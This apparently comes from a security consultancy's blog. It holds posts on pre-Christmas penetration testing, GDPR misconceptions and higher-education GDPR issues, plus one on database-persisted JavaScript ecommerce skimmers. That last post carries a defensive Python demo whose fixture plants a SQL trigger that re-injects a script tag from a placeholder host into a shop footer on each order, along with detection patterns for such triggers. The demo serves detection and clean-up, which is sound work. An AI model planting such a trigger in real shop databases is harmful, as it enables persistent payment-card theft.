Pen testing: why businesses need to be proactive not reactive ahead of the peak retail period

A breach at any time of the year is bad for business. But with the highest volume of sales – both retail and online – occurring between Black Friday and the January Sales, a customer data breach during this period could be catastrophic. With just a few weeks to go, it is time to be proactive, not reactive. Seeking external professional services at this stage could ultimately save immense damage to your business, your bottom line and your reputation.

First, some context. According to research (Carbon Black 2018), when it comes to cybercrime the most proactive investors are actually the cyber criminals themselves. It is estimated that they are now spending ten times more on finding cyber defence weaknesses in target organisations than the organisations themselves are spending on protecting against attack. Although the figures are global, with an estimated $1 trillion being spent by the cybercrime community compared to $96 billion by organisations to secure themselves, the UK has been identified as a major target.

Malicious attacks are therefore a very real threat, whether you are dealing with card transactions through a bricks-and-mortar shop or an online business. Unfortunately, compliance does not guarantee the security of your network systems. Like an MOT, it only demonstrates that at a certain date and time your business met the PCI DSS compliance standard. Similarly, businesses which have taken positive steps towards adhering to the requirements of GDPR will still need to take a proactive approach to defending against cybercrime.

So, what can be done? The most important investment at this stage is in professional penetration testing. This is the key to knowing exactly where potential vulnerabilities may lie. A bespoke combination of manual and automated testing is an extremely efficient way to identify weaknesses and can be carried out with minimal disruption. If serious gaps are identified, further testing will exploit and develop these as a potential hacker would, providing you with valuable intelligence. You will then be in a position to work with experts to take whatever remedial action is required in good time. If actual (as yet undetected) breaches have already occurred, these can be reported on and contained before significant damage occurs.

While prudent investment in cyber security is vital, there is, however, no need to throw money at the problem. Engaging a professional consultancy with the full range of services will save you any unnecessary expense. This is because the exercise will be scoped to ensure you pay for what you need, not what you don’t. A professional team will also have the expertise to manage the whole process in a proactive way to ensure you are ready for business at the end of November.

Although every precaution should be taken to protect your systems, test and exercise is not the only important element of a mature and robust cyber defence. Business Continuity Planning, Incident Response and Disaster Recovery Plans should also be in place and watertight. An expert consultancy will be able to help develop these so that business interruption in the event of a breach is kept to an absolute minimum. Additionally, SRM can provide Red Teaming and Incident Simulation activities to give you ultimate peace of mind.

To discuss the full availability of our Test and Exercise and Incident Response services, call +44 (0) 3450 21 21 51.

To receive regular blogs on topics relating to information security, follow us on LinkedIn.

Or visit our blog:

Pen testing: seeing both the wood and the trees

Penetration testing: man vs machine

The GDPR compliance fallacy

There is a curious irony that the enactment of the General Data Protection Regulation (GDPR), drawn up to protect the rights of individuals and their right to online privacy, has brought about an unprecedented torrent of spam. In the fortnight leading up to 25th May, inboxes were filled with emails asking people to opt in to mailing lists, supposedly so that the organisation in question could comply with the requirements of GDPR. There are two fallacies to be addressed here.

Firstly, although individuals should be given the option to be removed from any mailing list, if they have willingly provided their contact details to the organisation and that organisation has maintained a record of the data collected, with the data subject being informed about what the data would be used for and for how long it would be kept, their consent may be considered to be implicit. In these circumstances new explicit consent is not required.

Secondly, although the principles of GDPR are enshrined in UK law and failure to adhere to them can lead to significant fines, there is currently no concrete GDPR compliance process. It is expected that a GDPR compliance standard will be drawn up in the near future, but for now, organisations can use the organisational governance requirements provided by the Payment Card Industry Data Security Standard (PCI DSS) or ISO 27001 to provide a helpful framework. It is then the responsibility of the organisation’s Data Protection Officer (DPO) or Chief Information Security Officer (CISO) to ensure that the additional requirements of GDPR are included in their systems. These are just two of many fallacies surrounding the GDPR.

Having detailed information security policies and procedures is an important step, but on their own they will not ensure that the requirements of GDPR are satisfied. Plans and policies simply demonstrate management intent and will be ineffective in satisfying the requirements of GDPR unless clear guidelines are provided, in an easily understood format, to the grass roots of an organisation. Many businesses would do well to redirect some of the energy spent communicating with their customers into ensuring a good channel of communication about GDPR with their employees.

It is important to remember that GDPR should not be seen as a burden but rather a positive force for change, focusing attention on implementing better processes for how we collect, store and manage data and thereby enhancing and building better customer relationships.

Professional expert guidance will assist in streamlining this process. SRM’s GDPR team provides a business-focused service to organisations of all types and size at all ends of the GDPR-readiness spectrum. We have operated in this arena for many years and our GDPR consultants have undertaken GCHQ certified training. We can also take on the full CISO or DPO role if required.


To gauge your level of GDPR readiness, see our step by step self-assessment guide.

See our GDPR web page.

Or visit our blog:

The key to GDPR is common sense

How PCI compliance puts you on course for GDPR


eDisclosure webinar: seven reasons why your firm should consider a managed service

SRM is hosting a free eDisclosure webinar on Wednesday 18th April at 3pm.

We find ourselves in an ever-changing eDisclosure landscape. Join us for our upcoming webinar, during which the head of our eDisclosure team, Colin Gray, will explore the seven reasons why your firm should consider a managed service rather than addressing eDisclosure on an ad hoc basis.

All you need to do is register here.

GDPR: 10 key issues facing UK higher education

The world of higher education is about to be turned on its head. This is due to the imminent enactment of the General Data Protection Regulation (GDPR) which will come into effect on 25th May 2018. It marks a new era in the world of personal data protection with accountability at its centre. Although the updating of data protection law is overdue and welcomed by consumers, it does put demanding responsibilities onto the shoulders of Chief Information Security Officers (CISOs) in higher education institutions across the UK.

True expertise in GDPR compliance is a rare commodity and few resident CISOs have had time to acquire the required skill set. For this reason, many are using the additional resource and support of specialists to ensure the compliance requirements are met and resilient strategies put in place. SRM’s GDPR team has operated in the information security environment for many years and our GDPR consultants have undergone GCHQ certified training and gained GDPR Practitioner certification. As such they are uniquely well-placed to advise on the strategic implementation of GDPR. Here, they identify the key issues facing the higher education sector.

1. Awareness

It is important that everyone is aware of the changes that GDPR will bring. Vice Chancellors, executive boards, deans, academics and lecturers will all need to be aware of how the changes in data protection legislation will affect them. The mantle of data protection usually falls to the Chief Information Security Officer (CISO) who is likely to take on or oversee the role of Data Protection Officer (DPO), which is a requirement of GDPR. To ensure this is done effectively, the CISO will need to have senior-level influence, with the relevant knowledge and authority to manage the process or be given the financial resource to secure additional support and expertise from an industry professional or Virtual CISO service.

2. Information life cycle audit

Institutions will be held more accountable for the data they hold. In addition to keeping records about what personal data exists within the organisation’s systems, GDPR requires a documented understanding of why information is held, how it is collected, when it will be deleted or anonymised and who has access to it. Data will include everything from phone records to employment details. Some information will be categorised as sensitive and some as non-sensitive, and all of this information needs to be mapped.

3. Incident Response

Keeping information secure is a primary requirement and there will be new obligations to report security breaches to the Information Commissioner’s Office (ICO) within 72 hours where the breach creates a risk to the affected individuals. This is likely to occur, for example, in cases of identity theft or financial loss, and organisations will also be required to inform the individuals affected. Incident Response, which outlines protocols to detect, investigate and respond to personal data breaches, is an important element of this process.

4. Data Protection by Design

GDPR introduces new obligations on information-handling processes and the systems that are developed. Data protection should be built in with data privacy settings being the default. It is anticipated that GDPR will require ‘data protection by design’ to be extended to existing systems within three years. Formal data protection impact assessments should be undertaken as part of the design process.

5. Demonstration of consent

Not all data processing requires explicit consent, but where it is applicable, institutions need to be able to demonstrate that consent is ‘freely given, specific, informed and unambiguous’. This means individuals will need to specifically opt in, rather than simply fail to opt out.

6. Considering the necessity of data collection

Continuing with the concept of consent, institutions will be required to consider whether the collection of data and its processing is actually necessary. Recognised legal bases include contract, legal obligation, vital interest, public interest or legitimate interest of the organisation. If these apply then processes must meet the requirements of GDPR.

7. Reviewing privacy notices

When accessing individuals’ personal data, these individuals must be informed of the legal basis for processing their data, the retention period and their right to complain to the ICO if they consider there to be an issue. This will typically be in the form of a privacy notice.

8. Increased consumer expectations

High profile breaches have brought damaging publicity to a number of higher education institutions. With this heightened awareness comes an increased knowledge of the individual’s rights to data privacy. Those using an institution’s systems will expect to have their data protected and may challenge where this is not obviously being promoted. Communication about GDPR compliance will be a necessary aspect of the DPO role.

9. Ensuring an individual’s rights can be upheld

Under GDPR the rights of individuals have been enhanced. They include the right to subject access, having inaccuracies corrected, having information erased, data portability and the right to be excluded from direct marketing or automated decision-making and profiling.

10. Data breach notification

GDPR introduces the mandatory reporting of data breaches to the regulator without undue delay and within 72 hours of becoming aware of the breach. In some cases this will apply to the data subjects as well. Higher Education institutions therefore need to give careful thought to breach prevention and to ensuring that there is a data breach procedure in place. In-house awareness training for staff is a vital element of this process. Having a coherent approach to data breaches will not only ensure compliance with GDPR but has the added benefit of minimising adverse publicity.


SRM’s GDPR team provides a business-focused service to organisations and higher education institutions of all types and size, at all ends of the GDPR-readiness spectrum. While we provide unrivalled technical and compliance expertise, we also understand how businesses and higher education institutions operate, working with clients in the GDPR compliance process with the focus on delivering robust and effective compliance, not on selling products.

For more information on our GDPR services visit our GDPR page or our Virtual CISO service page.

To gauge your level of GDPR readiness, complete our GDPR Self Assessment Questionnaire.

Or read our blog:

How does GDPR differ from the UK Data Protection Bill?

How a CISO can exert influence at board level


Emerging Trend: Persistent JavaScript Ecommerce Malware

Our analysts report another trend that administrators should be aware of. This is a JavaScript-based eCommerce malware that is able to re-infect websites automatically after an incomplete removal. It has been identified as a new technique being used by cyber criminals.

This type of malware obtains its persistence by modifying databases to force the injection of a malicious JavaScript file into an eCommerce webpage. By targeting databases, the malware becomes resilient to normal removal attempts. Cyber criminals have recently used this technique to target eCommerce merchants by successfully injecting the JavaScript code into a database field of a merchant’s website and compromising payment card data.

This malware reinfection method can be used on any eCommerce platform that uses database fields to populate content on the shopping cart webpage. Reinfection of websites can be done with the following processes:
1. A database trigger is added to the order table, which injects the malicious JavaScript link into the website template fields.
2. The trigger is executed every time a new order is made.

Scanning for malicious code in HTML files alone is not sufficient to detect this malware. Analysis of the database is required to ensure a proper clean-up of JavaScript eCommerce malware is conducted.
Regular scanning of webservers for malware is one recommended mitigation measure eCommerce websites can take to identify security vulnerabilities. Another recommended best practice is to check for malicious database triggers on eCommerce websites and subsequently remove them.
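The following is an added example, not SRM's own tooling, showing why a content-only clean-up fails against the trigger-based persistence described above and what a database-aware check looks like. It uses an in-memory SQLite database so it runs offline; the table names (`cms_block`, `sales_order`), the trigger name and the `example.invalid` host are all constructed for the demonstration and are not indicators from any real incident. On a MySQL or MariaDB shop database the same trigger enumeration is done against `information_schema.TRIGGERS` (columns `TRIGGER_NAME`, `EVENT_OBJECT_TABLE`, `ACTION_STATEMENT`) instead of `sqlite_master`.

```python
import re
import sqlite3

# Patterns used to spot injected script content in template fields and in trigger bodies.
SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.IGNORECASE | re.DOTALL)
SCRIPT_HINT = re.compile(r"<script\b|\bsrc\s*=\s*[\"']?\s*(?:https?:)?//", re.IGNORECASE)
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def quote_ident(name):
    """Allow only plain identifiers before they are spliced into SQL text."""
    if not IDENT.match(name):
        raise ValueError(f"unsafe identifier: {name!r}")
    return f'"{name}"'


def suspicious_triggers(conn):
    """Enumerate every trigger and flag those whose body carries script content.
    sqlite_master.sql holds the full CREATE TRIGGER text (MySQL: ACTION_STATEMENT)."""
    rows = conn.execute(
        "SELECT name, tbl_name, sql FROM sqlite_master WHERE type = 'trigger'"
    ).fetchall()
    return [{"trigger": name, "on_table": tbl}
            for name, tbl, sql in rows if SCRIPT_HINT.search(sql or "")]


def suspicious_rows(conn, table, key_col, content_col):
    """Return the keys of content/template rows that contain a <script> tag."""
    query = (f"SELECT {quote_ident(key_col)}, {quote_ident(content_col)} "
             f"FROM {quote_ident(table)}")
    return [key for key, content in conn.execute(query)
            if SCRIPT_TAG.search(content or "")]


def strip_scripts(conn, table, key_col, content_col):
    """Content-only clean-up: remove <script> blocks from flagged rows."""
    for key in suspicious_rows(conn, table, key_col, content_col):
        sel = (f"SELECT {quote_ident(content_col)} FROM {quote_ident(table)} "
               f"WHERE {quote_ident(key_col)} = ?")
        (content,) = conn.execute(sel, (key,)).fetchone()
        upd = (f"UPDATE {quote_ident(table)} SET {quote_ident(content_col)} = ? "
               f"WHERE {quote_ident(key_col)} = ?")
        conn.execute(upd, (SCRIPT_TAG.sub("", content), key))
    conn.commit()


def drop_triggers(conn, findings):
    """Remove the triggers flagged by suspicious_triggers()."""
    for finding in findings:
        conn.execute(f"DROP TRIGGER {quote_ident(finding['trigger'])}")
    conn.commit()


def build_fixture():
    """Constructed store shaped like a shop's CMS-block and order tables, with a
    trigger of the kind described in the post (placeholder host, not a real IoC)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE cms_block (identifier TEXT PRIMARY KEY, content TEXT);
        CREATE TABLE sales_order (id INTEGER PRIMARY KEY, grand_total REAL);
        INSERT INTO cms_block VALUES ('footer', '<p>Thanks for shopping with us.</p>');
        CREATE TRIGGER after_order_insert AFTER INSERT ON sales_order
        BEGIN
            UPDATE cms_block
               SET content = content || '<script src="https://cdn.example.invalid/loader.js"></script>'
             WHERE identifier = 'footer' AND content NOT LIKE '%example.invalid%';
        END;
    """)
    return conn


def demo():
    """Contrast content-only clean-up with trigger-aware clean-up."""
    conn = build_fixture()

    def place_order(total):
        conn.execute("INSERT INTO sales_order (grand_total) VALUES (?)", (total,))

    place_order(19.99)                                          # first order: footer gets the script
    strip_scripts(conn, "cms_block", "identifier", "content")   # what an HTML-only scan would fix
    place_order(5.00)                                           # next order: the trigger fires again
    reinfected = suspicious_rows(conn, "cms_block", "identifier", "content")

    found = suspicious_triggers(conn)                           # now inspect the database itself
    drop_triggers(conn, found)
    strip_scripts(conn, "cms_block", "identifier", "content")
    place_order(42.00)
    still_dirty = suspicious_rows(conn, "cms_block", "identifier", "content")

    return {
        "reinfected_after_content_only_cleanup": reinfected,
        "triggers_flagged": [f["trigger"] for f in found],
        "rows_dirty_after_trigger_removal": still_dirty,
    }


if __name__ == "__main__":
    print(demo())
```

Running `demo()` shows the footer block being re-injected by the next order after the script tag alone was stripped, and staying clean only once the trigger has been found and dropped. In practice the trigger check belongs in the same scheduled job as the webserver file scan, and any `src=` host it surfaces should be treated as an indicator and reviewed before the trigger is removed.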

If you are in doubt, contact the SRM team, who can arrange to run a check for you!

Managing Director of SRM, Tom F is a regular contributor to the SRM blog.

SRM Blog